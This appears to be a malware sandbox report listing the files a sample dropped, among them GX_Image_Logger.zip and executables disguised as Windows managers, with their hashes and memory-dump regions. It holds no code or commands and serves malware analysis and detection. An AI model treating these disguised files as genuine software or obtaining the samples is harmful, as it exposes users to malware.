f0acf292385abc05d6281833aaf162fc63810aa5d9ae29300c17276dacb31bea

SHA512
633b0bcb372482ef86c13cc82b8b04d2e5bcf95f128e0ec70f1b5f9efa1105e4e5c17d591cc4c0cca8ba571a3c779e9cd0130383a219d2c02bd54577023ddadf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe

Filesize
316KB

MD5
675d9e9ab252981f2f919cf914d9681d

SHA1
7485f5c9da283475136df7fa8b62756efbb5dd17

SHA256
0f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d

SHA512
9dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe

Filesize
42KB

MD5
d499e979a50c958f1a67f0e2a28af43d

SHA1
1e5fa0824554c31f19ce01a51edb9bed86f67cf0

SHA256
bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e

SHA512
668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
1.1MB

MD5
d718a111c5739ea05f307f14ff278953

SHA1
cc4637edb17c09eba95683ae9ee2d24513b55fdf

SHA256
a81bbf363504504604cd46064b745f3a73d9b7853d71ad33be1bf3eea7697064

SHA512
d3e7c8540ccb2eb72d91c5349dd3b8d09fa677b29abd71c8abbbbf69156fb0805b5d591958873b5395754eb56794898e2c6c8fa3745132b899c6f088f7ca5d53

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
4.3MB

MD5
689384aeee0723665efaee2466f483b1

SHA1
5d79472075f49cb3308dba884f1cf8720ad48405

SHA256
6fa3528021608af32394800dcb8a6a8dc2c98fcc63c0a8e4c528227b215d4387

SHA512
c1bff0c3c9d67b5e8500ed3eb9aaa40a696d1568ee9b56c6ca0d03fa69b27fbc72115734f5063a5e1bbcd3a7dbabf23925daa5812e392b194dcd6869e27773ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
512KB

MD5
eead9d6a936e06d8e4bde69416edf494

SHA1
83799dfdec0a7413d9be77da483fdbfa0cef6f5a

SHA256
56f4565aab6820923927e5f5f8612eee4ef4eb1f1bc9cdd6679dbb3d972524f2

SHA512
93140f963aaef8764f25fda7f1d125d03545dec501f47e5a0aa7a67f3f6c03a69a32bf10b3121656fd05e19033df8a8bcbb02a881532fbc3f111c21818a45656

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\_bz2.pyd

Filesize
82KB

MD5
90f58f625a6655f80c35532a087a0319

SHA1
d4a7834201bd796dc786b0eb923f8ec5d60f719b

SHA256
bd8621fcc901fa1de3961d93184f61ea71068c436794af2a4449738ccf949946

SHA512
b5bb1ecc195700ad7bea5b025503edd3770b1f845f9beee4b067235c4e63496d6e0b19bdd2a42a1b6591d1131a2dc9f627b2ae8036e294300bb6983ecd644dc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\_decimal.pyd

Filesize
247KB

MD5
f78f9855d2a7ca940b6be51d68b80bf2

SHA1
fd8af3dbd7b0ea3de2274517c74186cb7cd81a05

SHA256
d4ae192bbd4627fc9487a2c1cd9869d1b461c20cfd338194e87f5cf882bbed12

SHA512
6b68c434a6f8c436d890d3c1229d332bd878e5777c421799f84d79679e998b95d2d4a013b09f50c5de4c6a85fcceb796f3c486e36a10cbac509a0da8d8102b18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\_hashlib.pyd

Filesize
64KB

MD5
8baeb2bd6e52ba38f445ef71ef43a6b8

SHA1
4132f9cd06343ef8b5b60dc8a62be049aa3270c2

SHA256
6c50c9801a5caf0bb52b384f9a0d5a4aa182ca835f293a39e8999cf6edf2f087

SHA512
804a4e19ea622646cea9e0f8c1e284b7f2d02f3620199fa6930dbdadc654fa137c1e12757f87c3a1a71ceff9244aa2f598ee70d345469ca32a0400563fe3aa65

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\_lzma.pyd

Filesize
155KB

MD5
cf8de1137f36141afd9ff7c52a3264ee

SHA1
afde95a1d7a545d913387624ef48c60f23cf4a3f

SHA256
22d10e2d6ad3e3ed3c49eb79ab69a81aaa9d16aeca7f948da2fe80877f106c16

SHA512
821985ff5bc421bd16b2fa5f77f1f4bf8472d0d1564bc5768e4dbe866ec52865a98356bb3ef23a380058acd0a25cd5a40a1e0dae479f15863e48c4482c89a03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\_socket.pyd

Filesize
81KB

MD5
439b3ad279befa65bb40ecebddd6228b

SHA1
d3ea91ae7cad9e1ebec11c5d0517132bbc14491e

SHA256
24017d664af20ee3b89514539345caac83eca34825fcf066a23e8a4c99f73e6d

SHA512
a335e1963bb21b34b21aef6b0b14ba8908a5343b88f65294618e029e3d4d0143ea978a5fd76d2df13a918ffab1e2d7143f5a1a91a35e0cc1145809b15af273bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\base_library.zip

Filesize
384KB

MD5
065573fa48d697ef8f3c766231cce313

SHA1
4ab01ba0f1110fbe0fb132a8ee59a4af631c0b2f

SHA256
6f0b93fa9887d710003195327b18a56b5d74e178445ca64ba24ba70231c8bc62

SHA512
85cc1abba81b215fe61368fc978d2d1463e825c677a8de239cf37a0eed3112abe4b26adf6596a13fec8761cc273b673a9f5c89cae420e60fd4303c3d45729c5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\libcrypto-3.dll

Filesize
2.0MB

MD5
79612fbeeb364c1958ae50509976f398

SHA1
d38e0965c6d7ef67d4ac2b6b617a348ede8b0390

SHA256
5e0355a25521b6c09e17b5461a19c24c6b253308854a9feb13c4e098fbb3f7ec

SHA512
d317ef69f816dae4aa529ccf549d07715a47ec9cd2f03802e3fe12d262483db58b2b0605080161e86b2ad90229e7cb650097e733edf868f0c983f97f054f2079

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\python312.dll

Filesize
384KB

MD5
18f6b5e135483991715fc48547883d79

SHA1
a9f1403525fe50f8b2f1a6e40698637e512da0ef

SHA256
4a6f27d3e09e73c77444c873c5181cce2487060712ea6a9ecbe2423f06403266

SHA512
949ca7681f3cbba61a1f260698004f3f70e0f42a576d6ed44d6fdc0621289224d4d08ff35b02c070f9faffffb492ee6e4f9272cadde845ac376aee435feeb61e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\python312.dll

Filesize
320KB

MD5
d01d0cb5c4f9ad471b2fecbe4027bcbd

SHA1
86726a75a55812aa2a35890462904ba88b7a1702

SHA256
2b56cc4a00aa2966954230179fb208a521ed0ae804cf646638d2d5191b053c71

SHA512
34da784791b65cdbe8ac47c0fc0916de196a2255b8e4544afd2a609fe0345b18ebc384ae8f1773fc907b81f1ef0dc8db09306b4a38dc9286a6bdf634a48e562f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\select.pyd

Filesize
29KB

MD5
e1604afe8244e1ce4c316c64ea3aa173

SHA1
99704d2c0fa2687997381b65ff3b1b7194220a73

SHA256
74cca85600e7c17ea6532b54842e26d3cae9181287cdf5a4a3c50af4dab785e5

SHA512
7bf35b1a9da9f1660f238c2959b3693b7d9d2da40cf42c6f9eba2164b73047340d0adff8995049a2fe14e149eba05a5974eee153badd9e8450f961207f0b3d42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67442\unicodedata.pyd

Filesize
1.1MB

MD5
fc47b9e23ddf2c128e3569a622868dbe

SHA1
2814643b70847b496cbda990f6442d8ff4f0cb09

SHA256
2a50d629895a05b10a262acf333e7a4a31db5cb035b70d14d1a4be1c3e27d309

SHA512
7c08683820498fdff5f1703db4ad94ad15f2aa877d044eddc4b54d90e7dc162f48b22828cd577c9bb1b56f7c11f777f9785a9da1867bf8c0f2b6e75dc57c3f53

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hsrxs0x4.ib3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\GX_Image_Logger.zip

Filesize
8.6MB

MD5
efcd339f991f3e2fac700f4a5d37dd51

SHA1
7f528a6d35eb966b91b1ee8289d0d6ba47977291

SHA256
5acef48c664710b6d0282b338a13c35f39607c9cc34a151af159314204bd6f8e

SHA512
26ef33ee59f19a48a4d82fd3f4df708362980e4557e0a166ddc22afea8a0cc46dbfedaa471b88423fc9da0553bff6577e34880e7903578909731bb4802648229

Download Submit
memory/4196-844-0x0000000006F00000-0x0000000006F1A000-memory.dmp

Filesize
104KB

Download
memory/4196-534-0x0000000002320000-0x0000000002330000-memory.dmp

Filesize
64KB

Download
memory/4196-531-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/4196-996-0x0000000002320000-0x0000000002330000-memory.dmp

Filesize
64KB

Download
memory/4196-935-0x0000000007150000-0x0000000007164000-memory.dmp

Filesize
80KB

Download
memory/4196-596-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/4196-570-0x0000000004D60000-0x0000000004D82000-memory.dmp

Filesize
136KB

Download
memory/4196-974-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/4196-911-0x0000000007140000-0x000000000714E000-memory.dmp

Filesize
56KB

Download
memory/4196-599-0x0000000005720000-0x0000000005786000-memory.dmp

Filesize
408KB

Download
memory/4196-876-0x0000000007100000-0x0000000007111000-memory.dmp

Filesize
68KB

Download
memory/4196-870-0x0000000007190000-0x0000000007226000-memory.dmp

Filesize
600KB

Download
memory/4196-856-0x0000000006F70000-0x0000000006F7A000-memory.dmp

Filesize
40KB

Download
memory/4196-607-0x0000000005790000-0x0000000005AE4000-memory.dmp

Filesize
3.3MB

Download
memory/4196-980-0x0000000007230000-0x000000000724A000-memory.dmp

Filesize
104KB

Download
memory/4196-840-0x0000000007540000-0x0000000007BBA000-memory.dmp

Filesize
6.5MB

Download
memory/4196-721-0x0000000002320000-0x0000000002330000-memory.dmp

Filesize
64KB

Download
memory/4196-787-0x00000000061B0000-0x00000000061E2000-memory.dmp

Filesize
200KB

Download
memory/4196-993-0x0000000007180000-0x0000000007188000-memory.dmp

Filesize
32KB

Download
memory/4196-519-0x00000000022C0000-0x00000000022F6000-memory.dmp

Filesize
216KB

Download
memory/4196-532-0x0000000002320000-0x0000000002330000-memory.dmp

Filesize
64KB

Download
memory/4196-994-0x0000000002320000-0x0000000002330000-memory.dmp

Filesize
64KB

Download
memory/4196-530-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/4196-792-0x0000000074660000-0x00000000746AC000-memory.dmp

Filesize
304KB

Download
memory/4196-626-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

Filesize
120KB

Download
memory/4196-627-0x0000000005C40000-0x0000000005C8C000-memory.dmp

Filesize
304KB

Download
memory/4196-804-0x0000000006190000-0x00000000061AE000-memory.dmp

Filesize
120KB

Download
memory/4196-809-0x0000000006DF0000-0x0000000006E93000-memory.dmp

Filesize
652KB

Download
memory/4196-794-0x000000007F170000-0x000000007F180000-memory.dmp

Filesize
64KB

Download
memory/4240-1026-0x00007FFF13EE0000-0x00007FFF149A1000-memory.dmp

Filesize
10.8MB

Download
memory/4240-987-0x0000014C6FCB0000-0x0000014C6FCC0000-memory.dmp

Filesize
64KB

Download
memory/4240-984-0x00007FFF13EE0000-0x00007FFF149A1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-1222-0x00000000024B0000-0x00000000024C0000-memory.dmp

Filesize
64KB

Download
memory/4496-1004-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/4496-990-0x00000000024B0000-0x00000000024C0000-memory.dmp

Filesize
64KB

Download
memory/4584-1185-0x00000000048C0000-0x00000000048D0000-memory.dmp

Filesize
64KB

Download
memory/4584-1181-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/5076-550-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-601-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-649-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-651-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-653-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-612-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-655-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-657-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-659-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-661-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-663-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-665-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-669-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-671-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-673-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-675-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-677-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-667-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-645-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-640-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-521-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/5076-535-0x00000000049F0000-0x0000000004A5C000-memory.dmp

Filesize
432KB

Download
memory/5076-638-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-636-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-634-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-549-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-632-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-629-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-999-0x0000000002460000-0x0000000002470000-memory.dmp

Filesize
64KB

Download
memory/5076-609-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-647-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-553-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-537-0x0000000002460000-0x0000000002470000-memory.dmp

Filesize
64KB

Download
memory/5076-555-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-569-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-517-0x00000000001E0000-0x0000000000216000-memory.dmp

Filesize
216KB

Download
memory/5076-591-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-580-0x00000000049F0000-0x0000000004A55000-memory.dmp

Filesize
404KB

Download
memory/5076-938-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/5836-813-0x000002445FED0000-0x000002445FEF2000-memory.dmp

Filesize
136KB

Download
memory/5836-786-0x00007FFF112C0000-0x00007FFF11D81000-memory.dmp

Filesize
10.8MB

Download
memory/5836-873-0x00007FFF112C0000-0x00007FFF11D81000-memory.dmp

Filesize
10.8MB

Download
memory/5836-791-0x000002445FE50000-0x000002445FE60000-memory.dmp

Filesize
64KB

Download
memory/5836-859-0x000002445FE50000-0x000002445FE60000-memory.dmp

Filesize
64KB

Download
memory/5836-806-0x000002445FE50000-0x000002445FE60000-memory.dmp

Filesize
64KB

Download
memory/7012-529-0x000002742B150000-0x000002742B1A4000-memory.dmp

Filesize
336KB

Download
memory/7012-577-0x00007FFF11980000-0x00007FFF12441000-memory.dmp

Filesize
10.8MB

Download
memory/7012-602-0x00007FFF11980000-0x00007FFF12441000-memory.dmp

Filesize
10.8MB

Download
memory/7012-548-0x00000274458C0000-0x00000274458D0000-memory.dmp

Filesize
64KB

Download
memory/7020-981-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/7288-552-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/7288-578-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/7288-520-0x0000000000950000-0x0000000000960000-memory.dmp

Filesize
64KB

Download
memory/7440-600-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/7440-590-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/7440-1201-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/7440-1218-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/7528-932-0x0000000073290000-0x0000000073A40000-memory.dmp

Filesize
7.7MB

Download
memory/7528-952-0x0000000005420000-0x0000000005430000-memory.dmp

Filesize
64KB

Download